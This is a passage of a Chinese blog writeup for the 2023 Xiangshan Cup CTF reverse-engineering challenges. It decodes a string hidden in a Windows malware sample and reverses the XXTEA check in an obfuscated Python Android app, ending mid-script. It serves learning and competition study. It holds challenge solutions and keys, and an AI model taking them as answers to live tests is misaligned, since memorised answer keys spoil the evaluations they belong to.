

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=dark>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="../../../../img/touxiang.png">
  <link rel="icon" href="../../../../img/touxiang.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="0P1N">
  <meta name="keywords" content="">
  
    <meta name="description" content="2023香山杯RE&amp;PWN writeupREURL从哪来32位windows恶意软件分析 微步检测 题目给的exe又在c盘生成了另一个程序并创建进程，ou.exe可以直接从微步下载，或者根据偏移提取 分析c盘中真正的恶意程序对数据进行逐位-30和base64加密 123456789101112131415161718192021222324252627282930313233343536">
<meta property="og:type" content="article">
<meta property="og:title" content="2023香山杯RE&amp;PWN writeup">
<meta property="og:url" content="https://lkliki.github.io/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/index.html">
<meta property="og:site_name" content="0P1N">
<meta property="og:description" content="2023香山杯RE&amp;PWN writeupREURL从哪来32位windows恶意软件分析 微步检测 题目给的exe又在c盘生成了另一个程序并创建进程，ou.exe可以直接从微步下载，或者根据偏移提取 分析c盘中真正的恶意程序对数据进行逐位-30和base64加密 123456789101112131415161718192021222324252627282930313233343536">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://lkliki.github.io/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/QQ%E6%88%AA%E5%9B%BE20231015153202.png">
<meta property="og:image" content="https://lkliki.github.io/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/QQ%E6%88%AA%E5%9B%BE20231019214727.png">
<meta property="og:image" content="https://lkliki.github.io/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/QQ%E6%88%AA%E5%9B%BE20231019214759.png">
<meta property="og:image" content="https://lkliki.github.io/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/QQ截图20231019222157.png">
<meta property="og:image" content="https://lkliki.github.io/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/QQ%E6%88%AA%E5%9B%BE20231019223303-1697726007256.png">
<meta property="og:image" content="https://lkliki.github.io/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/QQ%E6%88%AA%E5%9B%BE20231029232915.png">
<meta property="og:image" content="https://lkliki.github.io/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/QQ%E6%88%AA%E5%9B%BE20231029232947.png">
<meta property="og:image" content="https://lkliki.github.io/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/QQ%E6%88%AA%E5%9B%BE20231031125959.png">
<meta property="article:published_time" content="2023-10-18T13:42:20.000Z">
<meta property="article:modified_time" content="2023-11-02T02:41:35.550Z">
<meta property="article:author" content="0P1N">
<meta property="article:tag" content="writeup">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://lkliki.github.io/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/QQ%E6%88%AA%E5%9B%BE20231015153202.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>2023香山杯RE&amp;PWN writeup - 0P1N</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="../../../../css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="../../../../css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="../../../../css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"lkliki.github.io","root":"/","version":"1.9.2","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="../../../../js/utils.js" ></script>
  <script  src="../../../../js/color-schema.js" ></script>
  

  

  

  

  

  

  

  



  
<meta name="generator" content="Hexo 6.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="../../../../index.html">
      <strong>Welcome To 0P1N&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="../../../../index.html">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="../../../../archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="../../../../categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="../../../../tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="../../../../about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="../../../../links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('../../../../img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="2023香山杯RE&amp;PWN writeup"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-10-18 21:42" pubdate>
          2023年10月18日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          12k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          99 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">2023香山杯RE&amp;PWN writeup</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="2023香山杯RE-amp-PWN-writeup"><a href="#2023香山杯RE-amp-PWN-writeup" class="headerlink" title="2023香山杯RE&amp;PWN writeup"></a>2023香山杯RE&amp;PWN writeup</h1><h1 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h1><h2 id="URL从哪来"><a href="#URL从哪来" class="headerlink" title="URL从哪来"></a>URL从哪来</h2><p>32位windows恶意软件分析</p>
<p>微步检测<img src="/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/QQ%E6%88%AA%E5%9B%BE20231015153202.png" srcset="/img/loading.gif" lazyload alt="QQ截图20231015153202"></p>
<p>题目给的exe又在c盘生成了另一个程序并创建进程，ou.exe可以直接从微步下载，或者根据偏移提取</p>
<p>分析c盘中真正的恶意程序对数据进行逐位-30和base64加密</p>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><code class="hljs smali">v3[0] = 120;<br>v3[1] = 139;<br>v3[2] = 150;<br>v3[3] = 134;<br>v3[4] = 120;<br>v3[5] = 81;<br>v3[6] = 145;<br>v3[7] = 80;<br>v3[8] = 108;<br>v3[9] = 98;<br>v3[10] = 119;<br>v3[11] = 83;<br>v3[12] = 108;<br>v3[13] = 136;<br>v3[14] = 99;<br>v3[15] = 80;<br>v3[16] = 120;<br>v3[17] = 113;<br>v3[18] = 78;<br>v3[19] = 80;<br>v3[20] = 107;<br>v3[21] = 152;<br>v3[22] = 119;<br>v3[23] = 83;<br>v3[24] = 106;<br>v3[25] = 114;<br>v3[26] = 119;<br>v3[27] = 151;<br>v3[28] = 108;<br>v3[29] = 139;<br>v3[30] = 119;<br>v3[31] = 146;<br>v3[32] = 108;<br>v3[33] = 152;<br>v3[34] = 99;<br>v3[35] = 80;<br>v3[36] = 109;<br>v3[37] = 113;<br>v3[38] = 78;<br>v3[39] = 81;<br>v3[40] = 108;<br>v3[41] = 98;<br>v3[42] = 119;<br>v3[43] = 150;<br>v3[44] = 108;<br>v3[45] = 152;<br>v3[46] = 95;<br>v3[47] = 80;<br>v3[48] = 107;<br>v3[49] = 114;<br>v3[50] = 129;<br>v3[51] = 81;<br>v3[52] = 108;<br>v3[53] = 136;<br>v3[54] = 100;<br>v3[55] = 87;<br>v14 = 56;<br>Block = malloc(0x39u);<span class="hljs-built_in"></span><br><span class="hljs-built_in">if </span>( !Block )<br> <span class="hljs-built_in"> return </span>1;<br>memset(Block, 0, v14 + 1);<br>for ( i = 0; i &lt; v14; ++i )<br>  *((_BYTE *)Block + i) = LOBYTE(v3[i]) - 30;<br>v13 = sub_401110((const char *)Block);<br></code></pre></td></tr></table></figure>

<p>写脚本</p>
<figure class="highlight maxima"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs maxima">import <span class="hljs-built_in">base64</span><br>v3 = [<span class="hljs-number">120</span>, <span class="hljs-number">139</span>, <span class="hljs-number">150</span>, <span class="hljs-number">134</span>, <span class="hljs-number">120</span>, <span class="hljs-number">81</span>, <span class="hljs-number">145</span>, <span class="hljs-number">80</span>, <span class="hljs-number">108</span>, <span class="hljs-number">98</span>, <span class="hljs-number">119</span>, <span class="hljs-number">83</span>, <span class="hljs-number">108</span>, <span class="hljs-number">136</span>, <span class="hljs-number">99</span>, <span class="hljs-number">80</span>, <span class="hljs-number">120</span>, <span class="hljs-number">113</span>, <span class="hljs-number">78</span>, <span class="hljs-number">80</span>, <span class="hljs-number">107</span>, <span class="hljs-number">152</span>, <span class="hljs-number">119</span>, <span class="hljs-number">83</span>, <span class="hljs-number">106</span>, <span class="hljs-number">114</span>, <span class="hljs-number">119</span>, <span class="hljs-number">151</span>, <span class="hljs-number">108</span>, <span class="hljs-number">139</span>, <span class="hljs-number">119</span>, <span class="hljs-number">146</span>, <span class="hljs-number">108</span>, <span class="hljs-number">152</span>, <span class="hljs-number">99</span>, <span class="hljs-number">80</span>, <span class="hljs-number">109</span>, <span class="hljs-number">113</span>, <span class="hljs-number">78</span>, <span class="hljs-number">81</span>, <span class="hljs-number">108</span>, <span class="hljs-number">98</span>, <span class="hljs-number">119</span>, <span class="hljs-number">150</span>, <span class="hljs-number">108</span>, <span class="hljs-number">152</span>, <span class="hljs-number">95</span>, <span class="hljs-number">80</span>, <span class="hljs-number">107</span>, <span class="hljs-number">114</span>, <span class="hljs-number">129</span>, <span class="hljs-number">81</span>, <span class="hljs-number">108</span>, <span class="hljs-number">136</span>, <span class="hljs-number">100</span>, <span class="hljs-number">87</span>]<br><span class="hljs-built_in">block</span> = &#x27;&#x27;<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> v3:<br>    <span class="hljs-built_in">block</span> += chr(i-<span class="hljs-number">30</span>)<br><br><span class="hljs-built_in">block</span> = <span class="hljs-built_in">base64</span>.b64decode(<span class="hljs-built_in">block</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">block</span>)<br></code></pre></td></tr></table></figure>

<h2 id="hello-py"><a href="#hello-py" class="headerlink" title="hello_py"></a>hello_py</h2><p>chaquopy框架app的逆向</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/wwb1990/article/details/104051068">https://blog.csdn.net/wwb1990/article/details/104051068</a></p>
<p>java层找到MainActivity和import导入的b.c.a.a</p>
<p>这里应该是类似导入python代码，可以推测python文件名应该是hello</p>
<figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs abnf"><span class="hljs-attribute">s</span> <span class="hljs-operator">=</span> Python.getInstance().getModule(<span class="hljs-string">&quot;hello&quot;</span>)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure>

<p>这里通过callAttr调用了sayhello函数</p>
<figure class="highlight coffeescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs coffeescript">s.callAttr(<span class="hljs-string">&quot;sayHello&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-built_in">Object</span>[<span class="hljs-number">0</span>]);<br></code></pre></td></tr></table></figure>

<p>这里应该是监听鼠标点击按钮的事件，触发后跳转到a，即b.c.a.a</p>
<figure class="highlight haxe"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs haxe"><span class="hljs-built_in">this</span>.p.setOnClickListener(<span class="hljs-keyword">new</span> <span class="hljs-type">a</span>(<span class="hljs-built_in">this</span>));<br></code></pre></td></tr></table></figure>

<p>找到这里，最关键的check函数是python源码中的函数</p>
<figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">public void on<span class="hljs-constructor">Click(View <span class="hljs-params">view</span>)</span> &#123;<br>        Context baseContext;<br>        String str;<br>        String obj = this.f717b.r.get<span class="hljs-constructor">Text()</span>.<span class="hljs-keyword">to</span><span class="hljs-constructor">String()</span>;<br>        this.f717b.q.set<span class="hljs-constructor">Text(<span class="hljs-params">obj</span>)</span>;<br>        <span class="hljs-keyword">if</span> (<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">MainActivity</span>.</span></span>s.call<span class="hljs-constructor">Attr(<span class="hljs-string">&quot;check&quot;</span>, <span class="hljs-params">obj</span>)</span>.<span class="hljs-keyword">to</span><span class="hljs-constructor">Boolean()</span>) &#123;<br>            baseContext = this.f717b.get<span class="hljs-constructor">BaseContext()</span>;<br>            str = <span class="hljs-string">&quot;you are right~ flag is flag&#123;your input&#125;&quot;</span>;<br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>            baseContext = this.f717b.get<span class="hljs-constructor">BaseContext()</span>;<br>            str = <span class="hljs-string">&quot;Wrong!&quot;</span>;<br>        &#125;<br>        <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Toast</span>.</span></span>make<span class="hljs-constructor">Text(<span class="hljs-params">baseContext</span>, <span class="hljs-params">str</span>, 1)</span>.show<span class="hljs-literal">()</span>;<br>    &#125;<br></code></pre></td></tr></table></figure>

<p>问了chatgpt，该框架app打包后的python代码位于assets文件夹，但是里面只有.imy文件和so文件，so文件翻了一遍，都不像是有check函数，查看imy文件时发现开头都是PK，可能是压缩包，换后缀名为rar解压发现app.imy中就是hello.py</p>
<p>代码都是混淆后的，用pycharm对代码进行简单的重命名，如下对check函数进行了简单去混淆，分析可得加密流程是先将字符串四个字节一组小端序转换为int数组，一共36个字符9个int，然后xxtea加密，xxtea的特征有0x9e3779b9，5234的位移，6 + 52，</p>
<p>这题的xxtea代码和<a target="_blank" rel="noopener" href="https://blog.csdn.net/A951860555/article/details/120120400">该博客</a>的一模一样</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> java <span class="hljs-keyword">import</span> jboolean ,jclass <span class="hljs-comment">#line:1</span><br><span class="hljs-keyword">import</span> struct <span class="hljs-comment">#line:3</span><br><span class="hljs-keyword">import</span> ctypes <span class="hljs-comment">#line:4</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">MX</span> (O0O00OOO00OO00O00 ,O0OO0O00OO0O000OO ,OO000OO000000O0O0 ,OOO00O00OOO000OOO ,OO0OOO0OOO0OOOO0O ,O0OO000O0000O000O ):<span class="hljs-comment">#line:7</span><br>    OOO000O0O0OO00000 =(O0O00OOO00OO00O00 .value &gt;&gt;<span class="hljs-number">5</span> ^O0OO0O00OO0O000OO .value &lt;&lt;<span class="hljs-number">2</span> )+(O0OO0O00OO0O000OO .value &gt;&gt;<span class="hljs-number">3</span> ^O0O00OOO00OO00O00 .value &lt;&lt;<span class="hljs-number">4</span> )<span class="hljs-comment">#line:8</span><br>    OOO0OOOOOO0O0OO00 =(OO000OO000000O0O0 .value ^O0OO0O00OO0O000OO .value )+(OOO00O00OOO000OOO [(OO0OOO0OOO0OOOO0O &amp;<span class="hljs-number">3</span> )^O0OO000O0000O000O .value ]^O0O00OOO00OO00O00 .value )<span class="hljs-comment">#line:9</span><br>    <span class="hljs-keyword">return</span> ctypes .c_uint32 (OOO000O0O0OO00000 ^OOO0OOOOOO0O0OO00 )<span class="hljs-comment">#line:11</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">encrypt</span> (n, <span class="hljs-built_in">input</span>, key):<span class="hljs-comment">#line:14</span><br>    O0OOO0OO00O0000OO =<span class="hljs-number">0x9e3779b9</span> <span class="hljs-comment">#line:15</span><br>    OOOO0OOOO00O0OOOO = <span class="hljs-number">6</span> + <span class="hljs-number">52</span> // n <span class="hljs-comment">#line:16</span><br>    O00OO00000O0OO00O =ctypes .c_uint32 (<span class="hljs-number">0</span> )<span class="hljs-comment">#line:18</span><br>    OO0OOOO0O0O0O0OO0 =ctypes .c_uint32 (<span class="hljs-built_in">input</span> [n - <span class="hljs-number">1</span>])<span class="hljs-comment">#line:19</span><br>    OOOOO00000OOOOOOO =ctypes .c_uint32 (<span class="hljs-number">0</span> )<span class="hljs-comment">#line:20</span><br>    <span class="hljs-keyword">while</span> OOOO0OOOO00O0OOOO &gt;<span class="hljs-number">0</span> :<span class="hljs-comment">#line:22</span><br>        O00OO00000O0OO00O .value +=O0OOO0OO00O0000OO <span class="hljs-comment">#line:23</span><br>        OOOOO00000OOOOOOO .value =(O00OO00000O0OO00O .value &gt;&gt;<span class="hljs-number">2</span> )&amp;<span class="hljs-number">3</span> <span class="hljs-comment">#line:24</span><br>        <span class="hljs-keyword">for</span> OO0O0OOO000O0000O <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span> (n - <span class="hljs-number">1</span>):<span class="hljs-comment">#line:25</span><br>            OOO0OO00O0OO0O000 =ctypes .c_uint32 (<span class="hljs-built_in">input</span> [OO0O0OOO000O0000O + <span class="hljs-number">1</span>])<span class="hljs-comment">#line:26</span><br>            <span class="hljs-built_in">input</span> [OO0O0OOO000O0000O]=ctypes .c_uint32 (<span class="hljs-built_in">input</span> [OO0O0OOO000O0000O] + MX (OO0OOOO0O0O0O0OO0, OOO0OO00O0OO0O000, O00OO00000O0OO00O, key, OO0O0OOO000O0000O, OOOOO00000OOOOOOO).value).value <span class="hljs-comment">#line:27</span><br>            OO0OOOO0O0O0O0OO0 .value =<span class="hljs-built_in">input</span> [OO0O0OOO000O0000O]<span class="hljs-comment">#line:28</span><br>        OOO0OO00O0OO0O000 =ctypes .c_uint32 (<span class="hljs-built_in">input</span> [<span class="hljs-number">0</span>])<span class="hljs-comment">#line:29</span><br>        <span class="hljs-built_in">input</span> [n - <span class="hljs-number">1</span>]=ctypes .c_uint32 (<span class="hljs-built_in">input</span> [n - <span class="hljs-number">1</span>] + MX (OO0OOOO0O0O0O0OO0, OOO0OO00O0OO0O000, O00OO00000O0OO00O, key, n - <span class="hljs-number">1</span>, OOOOO00000OOOOOOO).value).value <span class="hljs-comment">#line:30</span><br>        OO0OOOO0O0O0O0OO0 .value =<span class="hljs-built_in">input</span> [n - <span class="hljs-number">1</span>]<span class="hljs-comment">#line:31</span><br>        OOOO0OOOO00O0OOOO -=<span class="hljs-number">1</span> <span class="hljs-comment">#line:32</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">input</span> <span class="hljs-comment">#line:34</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">check</span> (<span class="hljs-built_in">input</span>):<span class="hljs-comment">#line:63</span><br>    <span class="hljs-built_in">print</span> (<span class="hljs-string">&quot;checking~~~: &quot;</span> + <span class="hljs-built_in">input</span>)<span class="hljs-comment">#line:64</span><br>    <span class="hljs-built_in">input</span> =<span class="hljs-built_in">str</span> (<span class="hljs-built_in">input</span>)<span class="hljs-comment">#line:65</span><br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span> (<span class="hljs-built_in">input</span>)!=<span class="hljs-number">36</span> :<span class="hljs-comment">#line:66</span><br>        <span class="hljs-keyword">return</span> jboolean (<span class="hljs-literal">False</span> )<span class="hljs-comment">#line:67</span><br>    v1 =[]<span class="hljs-comment">#line:69</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span> (<span class="hljs-number">0</span> ,<span class="hljs-number">36</span> ,<span class="hljs-number">4</span> ):<span class="hljs-comment">#line:70</span><br>        result = <span class="hljs-built_in">input</span> [i:i + <span class="hljs-number">4</span>].encode (<span class="hljs-string">&#x27;latin-1&#x27;</span>)<span class="hljs-comment">#line:71          每四字节按latin-1编码</span><br>        v1 .append (result )<span class="hljs-comment">#line:72</span><br>    v2 =[]<span class="hljs-comment">#line:73</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> v1 :<span class="hljs-comment">#line:74</span><br>        v2 .append (struct .unpack (<span class="hljs-string">&quot;&lt;I&quot;</span>,i )[<span class="hljs-number">0</span> ])<span class="hljs-comment">#line:75 将四字节int按小端序打包</span><br>    <span class="hljs-built_in">print</span> (v2 )<span class="hljs-comment">#line:77</span><br>    result =encrypt (<span class="hljs-number">9</span> ,v2 ,[<span class="hljs-number">12345678</span> ,<span class="hljs-number">12398712</span> ,<span class="hljs-number">91283904</span> ,<span class="hljs-number">12378192</span> ])<span class="hljs-comment">#line:78</span><br>    chiper =[<span class="hljs-number">689085350</span> ,<span class="hljs-number">626885696</span> ,<span class="hljs-number">1894439255</span> ,<span class="hljs-number">1204672445</span> ,<span class="hljs-number">1869189675</span> ,<span class="hljs-number">475967424</span> ,<span class="hljs-number">1932042439</span> ,<span class="hljs-number">1280104741</span> ,<span class="hljs-number">2808893494</span> ]<span class="hljs-comment">#line:85</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span> (<span class="hljs-number">9</span> ):<span class="hljs-comment">#line:86</span><br>        <span class="hljs-keyword">if</span> chiper [i ]!=result [i ]:<span class="hljs-comment">#line:87</span><br>            <span class="hljs-keyword">return</span> jboolean (<span class="hljs-literal">False</span> )<span class="hljs-comment">#line:88</span><br>    <span class="hljs-keyword">return</span> jboolean (<span class="hljs-literal">True</span> )<span class="hljs-comment">#line:90</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">sayHello</span> ():<span class="hljs-comment">#line:92</span><br>    <span class="hljs-built_in">print</span> (<span class="hljs-string">&quot;hello from py&quot;</span>)<span class="hljs-comment">#line:93</span><br></code></pre></td></tr></table></figure>

<p>脚本，注意解密后需要每四字节转换端序后再转化成字符串</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span 